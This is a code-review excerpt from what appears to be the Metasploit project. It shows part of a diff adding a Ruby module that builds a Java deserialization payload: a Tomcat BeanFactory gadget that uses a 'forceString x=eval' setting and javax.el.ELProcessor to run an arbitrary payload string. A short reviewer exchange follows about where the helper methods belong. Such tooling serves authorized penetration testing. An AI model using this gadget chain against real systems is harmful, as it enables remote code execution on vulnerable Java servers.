lib/msf/util/java_deserialization/bean_factory.rb

```diff
@@ -0,0 +1,186 @@
+                      ]
+                    ),
+                    # stream.contents.first.class_data[0].class_data[2].values[3]
+                    builder.new_object(
+                      description: new_ref(handle: 8257547),
+                      data: [
+                        Rex::Java::Serialization::Model::Utf.new(stream, 'forceString'),
+                        Rex::Java::Serialization::Model::Utf.new(stream, 'x=eval'),
+                      ]
+                    ),
+                    # stream.contents.first.class_data[0].class_data[2].values[4]
+                    builder.new_object(
+                      description: new_ref(handle: 8257547),
+                      data: [
+                        Rex::Java::Serialization::Model::Utf.new(stream, 'x'),
+                        Rex::Java::Serialization::Model::Utf.new(stream, payload_string),
+                      ]
+                    ),
+                    # stream.contents.first.class_data[0].class_data[2].values[5]
+                    Rex::Java::Serialization::Model::NullReference.new,
+                    Rex::Java::Serialization::Model::NullReference.new,
+                    Rex::Java::Serialization::Model::NullReference.new,
+                    Rex::Java::Serialization::Model::NullReference.new,
+                    Rex::Java::Serialization::Model::NullReference.new,
+                  ]
+                )
+              ]
+            ).tap { |new_object|
+              new_object.class_desc.description.fields = [
+                new_field(type: 'int', name: 'capacityIncrement'),
+                new_field(type: 'int', name: 'elementCount'),
+                new_field(type: 'array', name: 'elementData', field_type: '[Ljava/lang/Object;')
+              ]
+            },
+            Rex::Java::Serialization::Model::EndBlockData.new,
+            Rex::Java::Serialization::Model::Utf.new(stream, 'org.apache.naming.factory.BeanFactory'),
+            Rex::Java::Serialization::Model::NullReference.new
+          ]
+        ),
+        Rex::Java::Serialization::Model::Utf.new(stream, 'javax.el.ELProcessor')
+      ]
+      stream.encode
+    end
+
+    class << self
+      private
+      # helper methods that are not in Rex::Java::Serialization::Builder
+      def new_field(opts = {})
+        name = Rex::Java::Serialization::Model::Utf.new(opts[:stream], opts[:name])
+        if opts[:field_type].is_a? String
+          field_type = Rex::Java::Serialization::Model::Utf.new(opts[:stream], opts[:field_type])
+        else
+          field_type = opts[:field_type]
+        end
+
+        field = Rex::Java::Serialization::Model::Field.new
+        field.type = opts[:type] || 'object'
+        field.name = name
+        field.field_type = field_type
+        field
+      end
+
+      def new_ref(opts = {})
+        ref = Rex::Java::Serialization::Model::Reference.new(opts[:stream])
+        ref.handle = opts[:handle]
+
+        ref
+      end
```

Comment:
I'm wondering if this would be better to add these methods directly in the `Rex::Java::Serialization::Builder` class?

Reply:
Well I was hoping to avoid that because the existing `Builder#new_class` method is overfitted in its implementation in how it handles fields, which is why I have this `new_field` method and use `#tap` to explicitly set them. That led me to believe we may not have a good understanding of all the future use cases so it may be better to just postpone that until we're more confident, i.e. these methods are needed elsewhere and we're confident they do what is needed.